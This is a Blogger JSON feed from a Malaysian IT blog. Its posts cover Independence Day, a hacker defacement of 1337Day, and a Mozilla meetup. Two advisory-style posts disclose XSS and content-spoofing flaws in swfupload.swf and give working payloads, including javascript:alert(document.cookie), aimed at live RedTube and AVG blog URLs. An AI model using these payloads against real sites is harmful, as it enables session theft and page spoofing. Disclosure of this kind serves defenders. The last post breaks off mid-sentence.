// API callback
related_results_labels({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-312255606046542141"},"updated":{"$t":"2020-12-01T01:17:10.661-08:00"},"category":[{"term":"sekuriti"},{"term":"exploit"},{"term":"iNFO"},{"term":"berita"},{"term":"xss"},{"term":"cerita"},{"term":"mozilla"},{"term":"wordpress"},{"term":"plugin"},{"term":"CSRF"},{"term":"cintaku"},{"term":"malware"},{"term":"Content Spoofing"},{"term":"Perjuangan Belum Selesai"},{"term":"Tun Dr. Mahathir"},{"term":"hootsuite"},{"term":"malaysia"},{"term":"melayuku"},{"term":"#HootSuite"},{"term":"#HootSuite University"},{"term":"1337day"},{"term":"HSUchat"},{"term":"HootAmb"},{"term":"Responsible Disclosure Acknowledgement"},{"term":"Secure Messenger"},{"term":"Text Injection"},{"term":"atm"},{"term":"firefox"},{"term":"google"},{"term":"ketuanan rakyat"},{"term":"personal"},{"term":"rakyat"},{"term":"upload"},{"term":"#‎HootAmb‬"},{"term":"Antivirus"},{"term":"Denial of Service Vulnerability"},{"term":"FirefoxOS2015"},{"term":"Heml.is"},{"term":"PC Defender Plus"},{"term":"Shellshock"},{"term":"Social media consultant"},{"term":"bash"},{"term":"bash\/Shellshock"},{"term":"bitcoin"},{"term":"browser"},{"term":"bunga raya"},{"term":"clickjacking"},{"term":"communitiy"},{"term":"dlink"},{"term":"donate"},{"term":"dos"},{"term":"e107"},{"term":"ebay"},{"term":"events"},{"term":"facebook"},{"term":"ffos"},{"term":"fvck"},{"term":"hati"},{"term":"kerja"},{"term":"media"},{"term":"merdeka"},{"term":"mobile"},{"term":"mozmy"},{"term":"reps"},{"term":"router"},{"term":"rss reader"},{"term":"ruby"},{"term":"social"},{"term":"spam"},{"term":"university"},{"term":"vulnerability"},{"term":"yahoo"}],"title":{"type":"text","$t":"Justryuz's"},"subtitle":{"type":"html","$t":"IT, Travel \u0026amp; Life"},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/posts\/default"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/-\/iNFO?alt=json-in-script\u0026max-results=5"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/search\/label\/iNFO"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"},{"rel":"next","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/-\/iNFO\/-\/iNFO?alt=json-in-script\u0026start-index=6\u0026max-results=5"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"48"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"5"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-8892831957784634298"},"published":{"$t":"2014-08-30T20:22:00.000-07:00"},"updated":{"$t":"2014-08-30T20:22:59.507-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"berita"},{"scheme":"http://www.blogger.com/atom/ns#","term":"bunga raya"},{"scheme":"http://www.blogger.com/atom/ns#","term":"google"},{"scheme":"http://www.blogger.com/atom/ns#","term":"iNFO"},{"scheme":"http://www.blogger.com/atom/ns#","term":"malaysia"},{"scheme":"http://www.blogger.com/atom/ns#","term":"merdeka"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Perjuangan Belum Selesai"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Tun Dr. Mahathir"}],"title":{"type":"text","$t":"Selamat Hari Merdeka"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"https:\/\/www.google.com.my\/logos\/doodles\/2014\/malaysia-independence-day-2014-5403793600544768.2-hp.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"106\" src=\"https:\/\/www.google.com.my\/logos\/doodles\/2014\/malaysia-independence-day-2014-5403793600544768.2-hp.jpg\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: center;\"\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cbr \/\u003EToday August 31, 2014 Malaysia is celebrating their Independence Day and Google Malaysia announced the day with their “Selamat Hari Merdeka” Google Doodle. The Hibiscus rosa-sinensis is the national flower of Malaysia. It’s known as the Bunga Raya in Malay. \u003Cbr \/\u003E\u003Cbr \/\u003ETo help celebrate this year’s Independence Day, guest artist \u003Ca href=\"http:\/\/www.redhongyi.com\/\"\u003ERed Hong Yi\u003C\/a\u003E from Google Doodles Team created an artful arrangement of the Hibiscus flower petals arranged into the words Google to celebrate the day.\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"http:\/\/2.bp.blogspot.com\/-aNcpfh8c6nw\/VAKUUp53yFI\/AAAAAAAAAyk\/mam9V9qDaSY\/s1600\/Malaysia-Independence-Day-750x464.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" src=\"http:\/\/2.bp.blogspot.com\/-aNcpfh8c6nw\/VAKUUp53yFI\/AAAAAAAAAyk\/mam9V9qDaSY\/s1600\/Malaysia-Independence-Day-750x464.jpg\" height=\"197\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: center;\"\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: left;\"\u003EShe also created a second version using some pink petals that you can see below. It was hard to choose! Both were quite beautiful but in the end the top one won and is the one featured today in Malaysia.\u003C\/div\u003E\u003Cdiv style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: left;\"\u003EHari Merdeka (Independence Day) is a national day in Malaysia and commemorates the independence of the Federation of Malaya from British colonial rule in 1957.\u003Cbr \/\u003E\u003Cbr \/\u003EThe day is celebrated on 31 August each year.\u003C\/div\u003E\u003Cdiv style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: left;\"\u003E#MalaysiakuMerdeka #Merdeka57\u003C\/div\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/8892831957784634298\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2014\/08\/selamat-hari-merdeka.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/8892831957784634298"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/8892831957784634298"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2014\/08\/selamat-hari-merdeka.html","title":"Selamat Hari Merdeka"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http:\/\/2.bp.blogspot.com\/-aNcpfh8c6nw\/VAKUUp53yFI\/AAAAAAAAAyk\/mam9V9qDaSY\/s72-c\/Malaysia-Independence-Day-750x464.jpg","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-7489539520789882470"},"published":{"$t":"2013-05-16T03:38:00.004-07:00"},"updated":{"$t":"2013-05-16T03:38:44.497-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"berita"},{"scheme":"http://www.blogger.com/atom/ns#","term":"exploit"},{"scheme":"http://www.blogger.com/atom/ns#","term":"iNFO"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"}],"title":{"type":"text","$t":"1337Day.com have been defaced by TurkGuvenligi.Info"},"content":{"type":"html","$t":"\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Ca href=\"http:\/\/www.ressim.net\/upload\/fdd7a261.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"160\" src=\"http:\/\/www.ressim.net\/upload\/fdd7a261.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cdiv style=\"text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Cstrong\u003E1337Day.com have been defaced by of hackers \u003C\/strong\u003E\u003C\/span\u003E\u003Cb\u003ETurkGuvenligi.Info.\u003C\/b\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Cstrong\u003E\u003C\/strong\u003E\u003Cbr \/\u003E \u003Cbr \/\u003E The hackers claim to have gained access to the server,  However, 1337Day representatives argue that these are merely false  claims and that their servers have been affected in any way.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Cbr \/\u003E \u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003EBut for this year i think 1337Day has been deface :v\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Cbr \/\u003E \u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Ca href=\"http:\/\/1.bp.blogspot.com\/-9t0O6ES0SXY\/UZS2mh9_9EI\/AAAAAAAAArs\/TOnz4yi9j0I\/s1600\/1337.PNG\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"162\" src=\"http:\/\/1.bp.blogspot.com\/-9t0O6ES0SXY\/UZS2mh9_9EI\/AAAAAAAAArs\/TOnz4yi9j0I\/s320\/1337.PNG\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Cbr \/\u003E \u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan id=\"intelliTxt\"\u003E\u003Ca href=\"http:\/\/zone-h.org\/mirror\/id\/19760972\"\u003Ehttp:\/\/zone-h.org\/mirror\/id\/19760972\u003C\/a\u003E\u003Cbr \/\u003E \u003C\/span\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/7489539520789882470\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/1337daycom-have-been-defaced-by.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/7489539520789882470"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/7489539520789882470"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/1337daycom-have-been-defaced-by.html","title":"1337Day.com have been defaced by TurkGuvenligi.Info"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http:\/\/1.bp.blogspot.com\/-9t0O6ES0SXY\/UZS2mh9_9EI\/AAAAAAAAArs\/TOnz4yi9j0I\/s72-c\/1337.PNG","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-2756852652535260749"},"published":{"$t":"2013-05-16T03:21:00.002-07:00"},"updated":{"$t":"2013-05-16T03:21:52.049-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"berita"},{"scheme":"http://www.blogger.com/atom/ns#","term":"iNFO"}],"title":{"type":"text","$t":"Firefox BM Contributor Meetup 2013 MozMy"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"https:\/\/fbcdn-sphotos-c-a.akamaihd.net\/hphotos-ak-prn2\/970790_427081420716286_1951846852_n.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"240\" src=\"https:\/\/fbcdn-sphotos-c-a.akamaihd.net\/hphotos-ak-prn2\/970790_427081420716286_1951846852_n.jpg\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cbr \/\u003E\u003Ch5 class=\"uiStreamMessage userContentWrapper\" data-ft=\"{\u0026quot;type\u0026quot;:1,\u0026quot;tn\u0026quot;:\u0026quot;K\u0026quot;}\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan class=\"messageBody\" data-ft=\"{\u0026quot;type\u0026quot;:3}\"\u003E\u003Cspan class=\"userContent\"\u003EWe would like to invite you participating our first contributor meetup Mozilla Malaysia 2013\u003Cbr \/\u003E Host : Mozilla Malaysia Community\u003Cbr \/\u003E What : Firefox BM Contributor Meetup 2013\u003Cbr \/\u003E When : May 25, 2013 (Saturday)\u003Cbr \/\u003E Time : 3.00 PM - 6.00 PM\u003Cbr \/\u003E Where : I-Train 1337 Accelerator, MSC Knowledge Worker Development  Centre building, Cyberjaya (Special thanks for Mike Smith - ITrain)\u003Cbr \/\u003E How to join : click \"going\" [1]\u003Cbr \/\u003E \u003Cbr \/\u003E [1] \u003Ca href=\"https:\/\/www.facebook.com\/events\/192097350940254\" rel=\"nofollow\" target=\"_blank\"\u003E\u003Cspan\u003Ehttps:\/\/www.facebook.com\/\u003C\/span\u003E\u003Cwbr\u003E\u003C\/wbr\u003E\u003Cspan class=\"word_break\"\u003E\u003C\/span\u003Eevents\/192097350940254\u003C\/a\u003E\u003Cbr \/\u003E \u003Cbr \/\u003E Let's meetup and get close with you and others! Feel free to invite  your friends if they want to join and share the event link to your  FB\/Twitter! Please check out event page for new updates!\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h5\u003E\u003Ch5 class=\"uiStreamMessage userContentWrapper\" data-ft=\"{\u0026quot;type\u0026quot;:1,\u0026quot;tn\u0026quot;:\u0026quot;K\u0026quot;}\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan class=\"messageBody\" data-ft=\"{\u0026quot;type\u0026quot;:3}\"\u003E\u003Cspan class=\"userContent\"\u003E.\/ryuzaki \u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h5\u003E\u003Ch5 class=\"uiStreamMessage userContentWrapper\" data-ft=\"{\u0026quot;type\u0026quot;:1,\u0026quot;tn\u0026quot;:\u0026quot;K\u0026quot;}\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan class=\"messageBody\" data-ft=\"{\u0026quot;type\u0026quot;:3}\"\u003E\u003Cspan class=\"userContent\"\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h5\u003E\u003Ch5 class=\"uiStreamMessage userContentWrapper\" data-ft=\"{\u0026quot;type\u0026quot;:1,\u0026quot;tn\u0026quot;:\u0026quot;K\u0026quot;}\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan class=\"messageBody\" data-ft=\"{\u0026quot;type\u0026quot;:3}\"\u003E\u003Cspan class=\"userContent\"\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h5\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/2756852652535260749\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/firefox-bm-contributor-meetup-2013-mozmy.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/2756852652535260749"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/2756852652535260749"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/firefox-bm-contributor-meetup-2013-mozmy.html","title":"Firefox BM Contributor Meetup 2013 MozMy"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-2263631384946778242"},"published":{"$t":"2013-05-13T07:48:00.004-07:00"},"updated":{"$t":"2013-05-13T07:49:15.571-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"iNFO"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"Cross Site Scripting in RedTube Official Blog"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Ca href=\"https:\/\/fbcdn-sphotos-b-a.akamaihd.net\/hphotos-ak-ash4\/182547_425615577534257_1920413802_n.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"187\" src=\"https:\/\/fbcdn-sphotos-b-a.akamaihd.net\/hphotos-ak-ash4\/182547_425615577534257_1920413802_n.jpg\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E#Title: Cross Site Scripting in RedTube Official Blog\u003Cbr \/\u003E\u003Cbr \/\u003EVector of operation: Remote\u003Cbr \/\u003EImpact: Cross Site Scripting \u0026amp; Content Spoofing\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E*Description:\u003Cbr \/\u003E\u003Cbr \/\u003EThe vulnerability is caused due to insufficient input validation in the parameter \u003Cbr \/\u003E“movieName” and \"buttonText\" in the script to swfupload.swf “ExternalInterface.call ()”. This can be \u003Cbr \/\u003Eexploited to execute arbitrary HTML and script code in a user’s browser session in \u003Cbr \/\u003Econtext of an affected site.\u003Cbr \/\u003E\u003Cbr \/\u003EThere are two vulnerabilities in RedTube Official Blog.\u003Cbr \/\u003E\u003Cbr \/\u003E*Content Spoofing\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-includes\/js\/swfupload\/swfupload.swf?buttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003EIt's possible to inject text, images and html (e.g. for link injection).\u003Cbr \/\u003E\u003Cbr \/\u003E*Cross-Site Scripting\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-includes\/js\/swfupload\/swfupload.swf?buttonText=\u0026lt;a href='javascript:alert(document.cookie)'\u0026gt;Click me\u0026lt;\/a\u0026gt;\u003Cbr \/\u003Eor\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-includes\/js\/swfupload\/swfupload.swf?movieName=\"]);}catch(e){}if(!self.a)self.a=!alert(\"xss\");\/\/\u003Cbr \/\u003E\u003Cbr \/\u003ECode will execute after click. It's strictly social XSS.\u003Cbr \/\u003E\u003Cbr \/\u003E*Proof of Concept Code\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-includes\/js\/swfupload\/swfupload.swf?movieName=[XSS]\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-includes\/js\/swfupload\/swfupload.swf?buttonText=testbuttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003E*Live Preview\u003Cbr \/\u003Ehttp:\/\/blog.redtube.com\/wp-includes\/js\/swfupload\/swfupload.swf?movieName=\"]);}catch(e){}if(!self.a)self.a=!alert(\"xss\");\/\/\u003Cbr \/\u003Ehttp:\/\/blog.redtube.com\/wp-includes\/js\/swfupload\/swfupload.swf?buttonText=\u0026lt;a href='javascript:alert(document.cookie)'\u0026gt;Click me\u0026lt;\/a\u0026gt;\u003Cbr \/\u003Ehttp:\/\/blog.redtube.com\/wp-includes\/js\/swfupload\/swfupload.swf?buttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E*Solution:\u003Cbr \/\u003EOn the server side, you can upgrade to a non-vulnerable version. Onthe client \u003Cbr \/\u003Eyou can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera. \u003Cbr \/\u003EInternet Explorer 8 with the XSS Filter won't execute the malicious scripts. \u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/2263631384946778242\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/title-cross-site-scripting-in-redtube.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/2263631384946778242"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/2263631384946778242"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/title-cross-site-scripting-in-redtube.html","title":"Cross Site Scripting in RedTube Official Blog"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-1965804144990118238"},"published":{"$t":"2013-05-13T07:47:00.003-07:00"},"updated":{"$t":"2013-05-13T07:47:33.519-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"iNFO"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"Cross Site Scripting in AVG Official Blog"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"https:\/\/fbcdn-sphotos-d-a.akamaihd.net\/hphotos-ak-frc1\/486654_425945747501240_1390067455_n.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"187\" src=\"https:\/\/fbcdn-sphotos-d-a.akamaihd.net\/hphotos-ak-frc1\/486654_425945747501240_1390067455_n.jpg\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E#Title: Cross Site Scripting in AVG Official Blog\u003Cbr \/\u003E\u003Cbr \/\u003EVector of operation: Remote\u003Cbr \/\u003EImpact: Cross Site Scripting \u0026amp; Content Spoofing\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E*Description:\u003Cbr \/\u003E\u003Cbr \/\u003EThe vulnerability is caused due to insufficient input validation in the parameter \u003Cbr \/\u003E“movieName” and \"buttonText\" in the script to swfupload.swf “ExternalInterface.call ()”. This can be \u003Cbr \/\u003Eexploited to execute arbitrary HTML and script code in a user’s browser session in \u003Cbr \/\u003Econtext of an affected site.\u003Cbr \/\u003E\u003Cbr \/\u003EThere are two vulnerabilities in AVG Official Blog.\u003Cbr \/\u003E\u003Cbr \/\u003E*Content Spoofing\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?buttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003EIt's possible to inject text, images and html (e.g. for link injection).\u003Cbr \/\u003E\u003Cbr \/\u003E*Cross-Site Scripting\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?buttonText=\u0026lt;a href='javascript:alert(document.cookie)'\u0026gt;Click me\u0026lt;\/a\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003ECode will execute after click. It's strictly social XSS.\u003Cbr \/\u003E\u003Cbr \/\u003E*Proof of Concept Code\u003Cbr \/\u003E\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?movieName=[XSS]\u003Cbr \/\u003Ehttp:\/\/[victim]\/Wordpress\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swfbuttonText=testbuttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003E*Live Preview\u003Cbr \/\u003Ehttp:\/\/blog.avg.com\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?movieName=\"]);}catch(e){}if(!self.a)self.a=!alert(\"xss\");\/\/\u003Cbr \/\u003Ehttp:\/\/blog.avg.com\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?buttonText=\u0026lt;a href='javascript:alert(document.cookie)'\u0026gt;Click me\u0026lt;\/a\u0026gt;\u003Cbr \/\u003Ehttp:\/\/blog.avg.com\/wp-content\/plugins\/nextgen-gallery\/admin\/js\/swfupload.swf?buttonText=testbuttonText=test\u0026lt;img src='http:\/\/i.imgur.com\/ltp2L8N.jpg'\u0026gt;\u003Cbr \/\u003E\u003Cbr \/\u003EScreenshot:\u003Cbr \/\u003Ehttp:\/\/i.imgur.com\/A4rKq0Q.jpg\u003Cbr \/\u003E\u003Cbr \/\u003E*Solution:\u003Cbr \/\u003EOn the server side, you can upgrade to a non-vulnerable version. Onthe client \u003Cbr \/\u003Eyou can use a browser that 